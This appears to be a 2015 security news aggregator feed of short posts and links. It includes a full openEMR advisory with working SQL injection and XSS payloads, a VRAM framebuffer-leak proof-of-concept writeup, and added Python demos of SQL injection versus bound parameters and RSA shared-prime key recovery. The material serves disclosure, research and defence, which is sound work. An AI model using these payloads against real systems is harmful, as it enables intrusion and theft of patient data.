Channel: BOT24

PEMU: A PIN Highly Compatible Out-of-VM Dynamic Binary Instrumentation Framework & Paper

You can view this new open source DBI framework at the following link:
https://github.com/utds3lab/pemu

and read the paper (abstract below) here: http://tinyurl.com/llbu4la

Abstract

Over the past 20 years, we have witnessed a widespread adoption of dynamic binary instrumentation (DBI) for numerous program analyses and security applications including program debugging, profiling, reverse engineering, and malware analysis. To date, there are many DBI platforms, and the most popular one is PIN, which provides various instrumentation APIs for process instrumentation. However, PIN does not support the instrumentation of OS kernels. In addition, the execution of the instrumentation and analysis routine is always inside the virtual machine (VM). Consequently, it cannot support any out-of-VM introspection that requires strong isolation. Therefore, this paper presents PEMU, a new open source DBI framework that is compatible with PIN-APIs, but supports out-of-VM introspection for both user level processes and OS kernels. Unlike in-VM instrumentation in which there is no semantic gap, for out-of-VM introspection we have to bridge the semantic gap and provide abstractions (i.e., APIs) for programmers. One important feature of PEMU is its API compatibility with PIN. As such, many PIN plugins are able to execute atop PEMU without any source code modification. We have implemented PEMU, and our experimental results with the SPEC 2006 benchmarks show that PEMU introduces reasonable overhead.



Multiple reflecting/stored XSS- and SQLi-vulnerabilities in openEMR v.4.2.0

Advisory: Multiple reflecting/stored XSS- and SQLi-vulnerabilities in openEMR v.4.2.0
Advisory ID: SROEADV-2015-08
Author: Steffen Rösemann
Affected Software: openEMR v.4.2.0 (Release-date: 28th Dec 2014)
Vendor URL: http://www.open-emr.org
Vendor Status: patched
CVE-ID: to be assigned after release of advisory via OSS list

==========================
Vulnerability Description:
==========================

Electronic health records and medical practice management application
OpenEMR 4.2.0 suffers from multiple SQL injection and reflecting XSS
vulnerabilities.

==================
Technical Details:
==================

All below described vulnerabilities can only be exploited by an already
authenticated user.

=====================
SQL injection vulnerabilities
=====================

An SQL injection vulnerability can be found in the facility_admin.php file
and can be abused by an attacker via the fid-parameter.

Exploit-Example:

http://{TARGET}/interface/usergroup/facility_admin.php?fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+



Another (blind) SQL injection vulnerability resides in
appt_encounter_report.php and can be abused by an attacker by modifying
the form_facility parameter in a POST request.

Exploit-Example:

POST /openemr-4.2.0/interface/reports/appt_encounter_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/openemr-4.2.0/interface/reports/appt_encounter_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

form_facility=3%27+AND+substring(version(),1,1)=%275&form_from_date=2015-01-13&form_to_date=2015-01-13&form_refresh=true


The last (blind) SQL injection vulnerability resides in the
appointments_report.php file and can likewise be abused by an attacker by
crafting their own SQL statements in the form_facility parameter of a POST
request.


Exploit-Example:

POST /openemr-4.2.0/interface/reports/appointments_report.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.3.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/openemr-4.2.0/interface/reports/appointments_report.php
Cookie: OpenEMR=p30d0tu19a9r04tjgnuu1oqqq4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 199

form_facility=3%27+and+substring(version(),1,1)=%274&form_provider=&form_from_date=2015-01-13&form_to_date=2015-01-13&form_apptstatus=&form_apptcat=ALL&form_orderby=comment&patient=&form_refresh=true


==============
XSS vulnerabilities
==============

A reflecting XSS-vulnerability can be found in user_admin.php via the
id-parameter.

Exploit-Example:

http://{TARGET}interface/usergroup/user_admin.php?id=4%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E



A stored XSS vulnerability resides in add_edit_event.php via the
input-field "form_comments" and is executed in appointments_report.php.


Exploit-Example:

<script>alert(document.cookie)</script>




=========
Solution:
=========

Install the latest patch (released 21st March 2015, see [3]).


====================
Disclosure Timeline:
====================

12/13-Jan-2015 - found the vulnerability
13-Jan-2015 - informed the developers
13-Jan-2015 - release date of this security advisory [without technical details]
13-Jan-2015 - vendor responded and announced a patch
20-Jan-2015 - vendor provides fix for testing purposes
20-Jan-2015 - agreement to release technical details when patch has been released
21-Mar-2015 - release date of the patch
22-Mar-2015 - release date of this security advisory
22-Mar-2015 - sent to FullDisclosure



========
Credits:
========

Vulnerabilities found and advisory written by Steffen Rösemann.

===========
References:
===========

[1] http://www.open-emr.org
[2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-08.html
[3] http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
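To make the defect class behind the fid injection concrete from the defender's side, here is an added Python example (not part of the advisory and not openEMR's code). It decodes the advisory's fid payload as the application would receive it, then contrasts a query built by string splicing with the same query using a bound parameter. The facility table, the host name and the SQLite-targeted payload are constructed stand-ins: the advisory's payload itself calls MySQL functions and spans 23 columns.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Request from the advisory; {TARGET} replaced by a constructed host name.
ADVISORY_URL = (
    "http://target.example/interface/usergroup/facility_admin.php?"
    "fid=3%27+and+1=2+union+select+1,user%28%29,3,4,version%28%29,"
    "database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+"
)

# Constructed stand-in for the facility table (three columns; the real one is wider).
SCHEMA = """
CREATE TABLE facility (id INTEGER PRIMARY KEY, name TEXT, phone TEXT);
INSERT INTO facility VALUES (1, 'Main Clinic', '555-0100');
INSERT INTO facility VALUES (3, 'East Branch', '555-0103');
"""

# Same shape as the advisory payload, re-targeted at SQLite: user()/version()/
# database() are MySQL functions and the real query has 23 columns, so three here.
SQLITE_PAYLOAD = "3' and 1=2 union select 1,sqlite_version(),'injected' -- "


def decoded_fid(url):
    """Return the fid parameter as PHP would see it after URL decoding."""
    return parse_qs(urlsplit(url).query)["fid"][0]


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(conn, fid):
    """Defect class from the advisory: the parameter is spliced into the SQL text."""
    sql = "SELECT id, name, phone FROM facility WHERE id = '%s'" % fid
    return conn.execute(sql).fetchall()


def lookup_hardened(conn, fid):
    """Bound parameter: the whole string is compared as one value, never parsed as SQL."""
    return conn.execute(
        "SELECT id, name, phone FROM facility WHERE id = ?", (fid,)
    ).fetchall()


if __name__ == "__main__":
    print("decoded fid:", decoded_fid(ADVISORY_URL))
    conn = fresh_db()
    # Spliced: the WHERE clause is disabled and the UNION row comes back.
    print("vulnerable:", lookup_vulnerable(conn, SQLITE_PAYLOAD))
    # Bound: no facility has that literal id, so nothing is returned.
    print("hardened:  ", lookup_hardened(conn, SQLITE_PAYLOAD))
```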

Reverse Engineering Android Part 1(Smali Intro)

In my recent studies in reverse engineering Android apps I have taken to learning the smali assembler/disassembler. It is my opinion that smali is a powerful tool and learning its syntax and usage will open many doors for you in the world of reverse engineering Android applications. Through scraping the internet I found it very difficult to find an article covering the process of disassembling, modifying, rebuilding and signing APKs. In this post I hope to cover the basics and give anyone who is interested the knowledge needed to start tinkering with Android apps.

more here.........http://ttcubicle.blogspot.com/2015/03/re-engineering-android-part-1smali-intro.html

Is your VirtualBox reading your E-Mail? The Palinopsia Bug: Recovering framebuffers from VRAM & PoC

HTML version with images available here: https://hsmr.cc/palinopsia

# The Palinopsia Bug
## Is your VirtualBox reading your E-Mail? Reconstruction of FrameBuffers from VRAM

This document describes a method of reading and displaying previously
used framebuffers from a variety of popular graphics cards. In all 4
tested laptops the content of the VRAM was not erased upon reboot.
It is also possible to show that the content of the host VRAM can be
accessed from a VirtualBox guest, thereby leaking possibly confidential
information from a trusted host into an untrusted guest machine.

## Affected drivers and operating systems

The following combinations of operating systems and drivers were tested
and shown to be susceptible to leaking previous frame buffers into
VRAM:

1. Linux using the open source radeon driver for AMD/ATI cards
2. Linux using the open source nouveau-driver for nVidia-cards
3. Linux using the closed source nVidia-driver
4. Windows using the closed source AMD/ATI catalyst driver

We did not test any other systems or drivers.

## Cards affected

During testing, the following 4 cards proved to be susceptible to this
method:

1. ATI Radeon HD3750
2. ATI Radeon HD4350/4550
3. nVidia NVS 5400M
4. nVidia GeForce GT650M

Note: The cards above are all the AMD and nVidia cards available at the
time of testing. It is therefore highly likely that a lot more cards
exhibit this behaviour.

On a laptop with an Intel HD4000 and a dedicated nVidia card where the
OS can switch between cards, one has to force the usage of the
dedicated card to read from VRAM. The internal graphics card seems to
be unaffected at the moment. Tests showed that in this setup only
programs forced to run on the dedicated card will leak data to VRAM.


## Proof of Concept

The basic idea of the proof-of-concept code is remarkably simple: It
allocates a number of texture buffers in VRAM without initializing
them, then directly renders them onto the screen, thereby accessing
previously used buffers.

The code, available at https://hsmr.cc/palinopsia/main.cpp, uses the SDL2 library.

In most Linux distributions it can be compiled using the following
command:
``g++ main.cpp -std=c++11 `pkg-config --libs --cflags sdl2` -o poc``

The proof of concept executable accepts 3 arguments:
`./poc <width> <height> <vram in megabytes>`

The first two arguments represent the width and height of buffers that
should be allocated. The last argument represents the amount of VRAM to
be allocated. To avoid crashes, this should be slightly lower than the
actually available VRAM.

## What can be reconstructed?

The quality of the result seems to be dependent on the combination of
the graphics hardware and the driver. Some combinations produce
almost perfect screenshots documenting user behaviour, while others
produce fragmented frames with what seems to be interlacing. The
example frames below demonstrate this effect. We are sure that some
math magic could help here.

## Reboot

3 out of 4 tested laptops did not erase or overwrite their VRAM upon
reboot! This offers a potential attack surface for an attacker trying
to read confidential information from a locked computer he has physical
access to. A possible attack on a Windows-machine might look like this:

1. The user works on a confidential document and locks their screen
2. The attacker gains physical access and reboots the system (from the
    lockscreen) into a live system of their choice
3. The attacker reads out the VRAM and recovers screenshots of the document


This scenario was tested on a Lenovo Thinkpad W500 with an ATI Radeon
HD3750 graphics card. Below is a screenshot from within the Windows
system, with a mock-up confidential document:

https://hsmr.cc/palinopsia/before/Capture.PNG

"Screenshot" of the same document after rebooting into a Xubuntu live
system and running the proof of concept code:
https://hsmr.cc/palinopsia/after/screenshot1.png

While the document is not entirely readable due to fragmentation and
interlacing, the color coding shows us that the entirety of the screen
might still be recoverable from VRAM. There are also clearly readable
fragments.

## Tails

Even 'the amnesic incognito live system' (tails) seems to be
susceptible to this attack. Fragmented screens of a terminated tails
session were recoverable after rebooting into a different operating
system. This partially defeats the 'amnesiac' property of the system.

The following two screenshots document this experiment:

1. booting into tails
2. generating an RSA private key and opening it in gedit
3. viewing parts of the private key in xubuntu after reboot
https://hsmr.cc/palinopsia/tails/before.png
https://hsmr.cc/palinopsia/tails/after.png

## Accessing host VRAM from inside a VirtualBox VM

If the "3D-Acceleration" feature of VirtualBox is activated, running
the proof-of-concept code from inside the VM provides the ability to
read framebuffers from the host system.

The following experiment was conducted to demonstrate this behaviour:

1. The host system (arch linux on a laptop running an ATI HD4350/4550
    card) is booted
2. Wikipedia and Youtube are opened in Chromium
3. A VirtualBox VM running Ubuntu 14.04 is booted
4. The proof of concept code is executed. The recovered frames belong to
    the host system and clearly show the visited websites

https://hsmr.cc/palinopsia/vm1.png
https://hsmr.cc/palinopsia/vm2.png

## Gallery

The following are interesting screens that were recovered using the
proof of concept code:

The i3lock screen during password entry, containing some interesting
artifacts:
https://hsmr.cc/palinopsia/gallery/i3lock.png

Some textures recovered after a few rounds of counterstrike:source:
https://hsmr.cc/palinopsia/gallery/cs.png

## What we didn't test

It might be possible to leak the content of the VRAM of
hardware-accelerated server systems that run thin client
infrastructures. In the scariest possible way this means that an
attacker could read the memory of any machine running in a company.
This could also affect big players providing virtual desktops in the
cloud.

### Disclaimer:

As time and money are things we don't have in huge amounts, we were
limited in our testing. Everything was done on a student budget in our
free time.

## Why full disclosure?

The method described in this document is not limited to a single
vendor or operating system, and has the potential to endanger private
data. Furthermore, the basic concept is so remarkably simple that it
seems unlikely that this is the first discovery of this behaviour.
Therefore, full disclosure seems to be the ethical choice.

## Mitigation

If you use your computer to access sensitive data, TURN IT OFF after
usage, so VRAM is disconnected from power. Be wary of virtual machines
with access to hardware accelerated graphics.

Authored by Bastian 
Reitemei@students.uni-marburg.de
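The writeup's mitigation advice about virtual machines with hardware-accelerated graphics can be turned into a routine check. This added Python example (not part of the writeup) parses `VBoxManage list vms` and `VBoxManage showvminfo <vm> --machinereadable` output for the `accelerate3d` setting and reports VMs that have it on; the sample output strings are constructed, and VBoxManage is assumed to be on PATH only when the audit is run live.

```python
import re
import shutil
import subprocess

# `VBoxManage showvminfo <vm> --machinereadable` prints one key="value" per line.
ACCEL3D_RE = re.compile(r'^accelerate3d="(on|off)"$', re.MULTILINE)
# `VBoxManage list vms` prints lines of the form: "vm name" {uuid}
VM_LINE_RE = re.compile(r'^"(.*)" \{[0-9a-fA-F-]+\}$', re.MULTILINE)


def accel3d_state(showvminfo_output):
    """Return 'on', 'off', or None if the key is absent from the machine-readable output."""
    m = ACCEL3D_RE.search(showvminfo_output)
    return m.group(1) if m else None


def vm_names(list_vms_output):
    """Extract registered VM names from `VBoxManage list vms` output."""
    return VM_LINE_RE.findall(list_vms_output)


def vboxmanage(args):
    """Run VBoxManage with the given arguments and return its stdout."""
    if shutil.which("VBoxManage") is None:
        raise RuntimeError("VBoxManage not found on PATH")
    return subprocess.run(["VBoxManage", *args], capture_output=True,
                          text=True, check=True).stdout


def audit(run_cmd=vboxmanage):
    """Map each registered VM to its accelerate3d state. run_cmd is injectable so
    the logic can be exercised on captured output without a VirtualBox install."""
    names = vm_names(run_cmd(["list", "vms"]))
    return {name: accel3d_state(run_cmd(["showvminfo", name, "--machinereadable"]))
            for name in names}


def report(findings):
    """Human-readable lines; VMs with 3D acceleration on get the remediation command."""
    lines = []
    for name, state in findings.items():
        if state == "on":
            lines.append(f"WARNING: {name}: 3D acceleration enabled; host VRAM may be "
                         f'readable from the guest. Fix: VBoxManage modifyvm "{name}" '
                         f"--accelerate3d off")
        else:
            lines.append(f"ok: {name} (accelerate3d={state})")
    return lines


if __name__ == "__main__":
    print("\n".join(report(audit())))
```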

OpenSSL DoS tester now available (CVE-2015-0291)

Paper: A look at the PGP ecosystem through the key server data

Abstract: PGP-based encryption systems use a network of key servers to share public keys. These key servers operate on an add-only basis, thus the data gives us access to PGP public keys from over 20 years of PGP usage. Analyzing this data allows searching for cryptographic weaknesses at large scale.

I created a parser script that puts the raw cryptographic data of the PGP keys into a database. Doing this allows large scale searches for well-known vulnerabilities. DSA signatures with a duplicate $k$ value due to bad random numbers allow the calculation of the private key. Similarly, analyzing RSA keys for shared prime factors allows factoring the modulus and thus also regenerating the private key.

A small number of breakable keys due to these weaknesses were found.

more here.........http://eprint.iacr.org/2015/262.pdf
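The shared-prime check the abstract refers to, as an added Python illustration that is not the author's parser or script: a pairwise gcd over a constructed set of small RSA moduli, two of which share a prime, followed by regeneration of the private exponent from the recovered factor. The primes, moduli and public exponent are constructed; real key-server dumps need the batch-gcd approach and real key sizes.

```python
from math import gcd

# Constructed toy moduli: n1 and n2 share the prime 10009 (the defect the paper
# scans for), n3 is independent. Real keys are 1024 bits and up; small primes
# keep the example readable.
P1, P2, P3, P4, P5 = 10007, 10009, 10037, 10039, 10061
MODULI = [P1 * P2, P2 * P3, P4 * P5]
E = 65537


def shared_factor_scan(moduli):
    """Pairwise gcd; return {modulus: shared_prime} for every modulus that shares
    a factor with another. O(n^2) is fine here; key-server scale needs batch gcd.
    Identical moduli (g == n) are a separate case and are not reported."""
    weak = {}
    for i in range(len(moduli)):
        for j in range(i + 1, len(moduli)):
            g = gcd(moduli[i], moduli[j])
            if 1 < g < moduli[i]:  # a proper common factor, i.e. a shared prime
                weak[moduli[i]] = g
                weak[moduli[j]] = g
    return weak


def recover_private_exponent(n, p, e):
    """Given one prime factor p of n, rebuild d = e^-1 mod phi(n), i.e. the
    'regenerated' private key the abstract describes."""
    q = n // p
    phi = (p - 1) * (q - 1)
    return pow(e, -1, phi)  # modular inverse, Python 3.8+


def check_recovered_key(n, d, e, m):
    """Round-trip a message through the public exponent and the recovered d."""
    return pow(pow(m, e, n), d, n) == m


if __name__ == "__main__":
    weak = shared_factor_scan(MODULI)
    for n, p in weak.items():
        d = recover_private_exponent(n, p, E)
        print(f"n={n} shares prime {p}; recovered d round-trips: "
              f"{check_recovered_key(n, d, E, 42)}")
```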

rdtsc x86 instruction to detect virtual machines

We are going to look at the rdtsc instruction technique and how it is used to detect VMs here: http://blog.badtrace.com/post/rdtsc-x86-instruction-to-detect-vms/

Phishing and the .gov TLD

Brand owners frequently use SPF and DKIM to protect their brands from email forgery. For example, a brand owner could register the same domain name under multiple top-level domains (TLDs) (such as .com, .net, .org, etcetera) and announce SPF/DKIM records for all of these domains (even if they were not actively being used). While generally effective, there is one loophole: what about the .gov TLD?

This loophole was recently exploited in a massive phishing attack against American Express, which started on March 4.

more here.............................http://blog.trendmicro.com/trendlabs-security-intelligence/phishing-and-the-gov-tld/

Automating WPA/WPA2 cracking with Raspberry Pi

The idea was to automate both WPA / WPA2 handshake capture and preshared key cracking (ideally on a high-end GPU or even multiple GPUs). There were a few restrictions: (1) the device should be portable (e.g., for wardriving), (2) should be able to run 24/7 without taking a loan to pay for my electricity bills, and (3) the price should be considerably low (in case the device gets lost or stolen).

Raspberry Pi was a perfect candidate.

more here.......http://whabbit.blogspot.com.au/2015/03/automating-wpawpa2-cracking-with.html

Paper: On the Effectiveness of Full-ASLR on 64-bit Linux

ABSTRACT

Address-Space Layout Randomization (ASLR) is a technique used to thwart attacks which rely on knowing the location of the target code or data. The effectiveness of ASLR hinges on the entirety of the address space layout remaining unknown to the attacker. Only executables compiled as Position Independent Executable (PIE) can obtain the maximum protection from the ASLR technique since all the sections are loaded at random locations. We have identified a security weakness in the implementation of the ASLR in Linux when the executable is PIE compiled, named offset2lib. A PoC attack is described to illustrate how the offset2lib can be exploited. Our attack bypasses the three most widely adopted and effective protection techniques: No-eXecutable bit (NX), address space layout randomization (ASLR) and stack smashing protector (SSP). A remote shell is obtained in less than one second. Finally, how the RenewSSP technique can be used as a workaround is discussed, and how to remove the offset2lib weakness from the current ASLR implementation is also presented.


more here........http://cybersecurity.upv.es/attacks/offset2lib/offset2lib-paper.pdf

Tails 1.3.1 Released

Tails, the security/privacy/anonymity-focused Debian-based Linux distribution, has just released version 1.3.1: https://tails.boum.org/download/index.en.html

Dell System Detect RCE vulnerability

I recently discovered a serious flaw with Dell System Detect that allowed an attacker to trigger the program to download and execute an arbitrary file without any user interaction. Below is a summary of the issue and the steps taken to bypass the protections Dell put in place.

more here..........http://tomforb.es/dell-system-detect-rce-vulnerability

Data Obfuscation: Now you see me... Now you don't...

This blog post shows how malware authors use Adobe Flash files to hide their creations' 'sensitive' data. I'll be using 2 recent Neutrino EK and 1 FlashPack malvertising samples to demonstrate it. In the case of Neutrino EK our goal will be extraction and decryption of its configuration file and in the malvertising case we'll be after the initial payload URL + exploit shellcode.

more here......http://malwageddon.blogspot.in/2015/03/data-obfuscation-now-you-see-me-now-you.html

BitWhisper: The Heat is on the Air-Gap

Researcher Mordechai Guri, guided by Prof. Yuval Elovici, has uncovered a new method to breach air-gapped systems. Our last finding on air-gap security was published in August of 2014, using a method called Air-Hopper which utilizes FM waves for data exfiltration. The new research initiative, termed BitWhisper, is part of the ongoing research on the topic of air-gap security at the Cyber Security Research Center at Ben-Gurion University. See more at: http://cyber.bgu.ac.il/blog/bitwhisper-heat-air-gap

Johnson Controls Metasys Vulnerabilities – Part I

Last week, ICS-CERT released an advisory on a set of Johnson Control MetaSys vulnerabilities I reported. You can find the advisory here: https://ics-cert.us-cert.gov/advisories/ICSA-14-350-02

It’s interesting to note that my initial email describing the vulnerabilities was sent on November 22nd, 2013. So, 1 year, 3 months, and 23 days later… we finally get a public advisory.

more here......http://xs-sniper.com/blog/2015/03/23/johnson-controls-metasys-vulnerabilities-part-i/

How I hacked India’s biggest startup

A few weeks ago I was monitoring my phone traffic from a proxy server. While doing that I saw Ola API calls going from my phone (since I was booking a cab).

For those who don’t know about Ola, Ola Cabs is the biggest cab provider in India and also the biggest competitor of Uber (again in India). It has raised $500 million in funding, and processes 150,000 bookings a day.

After seeing those flashing binary data going from my system I forgot my weekend project and started tweaking and reverse engineering Ola’s APIs which eventually resulted in breaking their money transaction system. As a result I was able to recharge my Ola wallet with any amount.

more here.........http://thenextweb.com/insider/2015/03/23/how-i-hacked-indias-biggest-startup/

"A CONFEDERACY OF 'PRIVACY' DUNCES": WHAT WE FOUND UNDER THE HOOD OF 'ANONYMOUS' CHAT APP WHISPER.SH USED BY MILLIONS

Every day we hear about a newfangled mobile app or "Internet Of Things" (IoT) device. Kickstarter and IndyGoGo are rife with IoT ridiculousness. (Crowdfunding is the new "Skymall" after all.) Mobile Apps are a new kind of celebrity. A new kind of techno-fashion. The apps you use define the cliques (demographics) you participate in. Which, in turn, defines not only who you socialize with, but how you participate in public discourse.

more here.....http://www.xipiter.com/musings/a-confederacy-of-privacy-dunces-what-we-found-under-the-hood-of-an-anonymous-chat-app-used-by-millions

Announcing the new version of SecureDrop, with the results from our third security audit

Today, we’re announcing the latest major release of SecureDrop, our open-source whistleblower submission system. SecureDrop 0.3 uses the same basic architecture found in 0.2, but contains numerous improvements focused on better usability for both journalists and sources, a radically simplified installation process, and an auto-updating procedure that allows us to deliver important fixes to all SecureDrop installations in a timely manner.

more here........https://freedom.press/blog/2015/03/announcing-securedrop-0.3

Important Notice About Your Twitch Account

There may have been unauthorized access to some Twitch user account information.

more here..........http://blog.twitch.tv/2015/03/important-notice-about-your-twitch-account/

Unauthorized digital certificates for several Google domains

On Friday, March 20th, we became aware of unauthorized digital certificates for several Google domains. The certificates were issued by an intermediate certificate authority apparently held by a company called MCS Holdings. This intermediate certificate was issued by CNNIC.

more here......http://googleonlinesecurity.blogspot.com/2015/03/maintaining-digital-certificate-security.html